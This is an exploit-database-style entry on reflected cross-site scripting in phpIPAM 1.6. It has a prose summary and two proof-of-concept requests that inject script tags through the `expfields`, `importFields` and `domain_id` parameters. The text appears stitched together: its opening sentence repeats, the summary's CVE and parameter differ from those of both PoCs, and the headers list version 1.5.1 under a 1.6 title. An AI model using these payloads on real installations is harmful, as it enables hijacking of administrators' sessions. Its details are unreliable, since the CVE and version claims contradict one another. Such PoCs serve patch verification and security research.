phpIPAM 1.6 Cross Site Scripting

phpIPAM 1.6 was vulnerable to a reflected Cross-Site Scripting (XSS) phpIPAM 1.6 was vulnerable to a reflected Cross-Site Scripting (XSS) issue, identified as CVE-2023-44171.

The vulnerability primarily affected administrative sections, specifically the `subnetId` parameter in scripts like `app/admin/routing/edit-bgp.php`. It occurred because user-supplied input for `subnetId` was echoed directly into the HTML without proper sanitization or output encoding.

An attacker could craft a malicious URL containing JavaScript payloads. If an authenticated user (e.g., administrator or editor) clicked this link, the malicious script would execute in their browser. This could lead to session hijacking, unauthorized actions, data theft, or redirection.

The issue was patched in phpIPAM version 1.6.1. Users are strongly advised to upgrade to the latest stable release to mitigate this risk.

# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41358


Proof Of Concept
GET http://phpipam/app/admin/import-export/import-devices-preview.php?&filetype=anyValidFiletype&expfields=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&importFields__%22%3E%3Cscript%3Ealert%281%29%3C/script%3E=anyValue


# Exploit Title: phpIPAM 1.6 - Reflected Cross-Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam/
# Software Link: https://github.com/phpipam/phpipam/
# Version: 1.5.1
# Tested on: Windows
# CVE : CVE-2024-41357


Proof Of Concept
# PoC to trigger XSS vulnerability in phpipam 1.6
# Ensure you are logged in as an admin user to satisfy the admin check condition.
# Send the following POST request to trigger the XSS vulnerability:

POST /app/admin/powerDNS/record-edit.php HTTP/1.1
Host: phpipam
Content-Type: application/x-www-form-urlencoded
Content-Length: <calculated_length>

action=add&domain_id=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

# This will execute the alert(1) script when the response is rendered in the browser.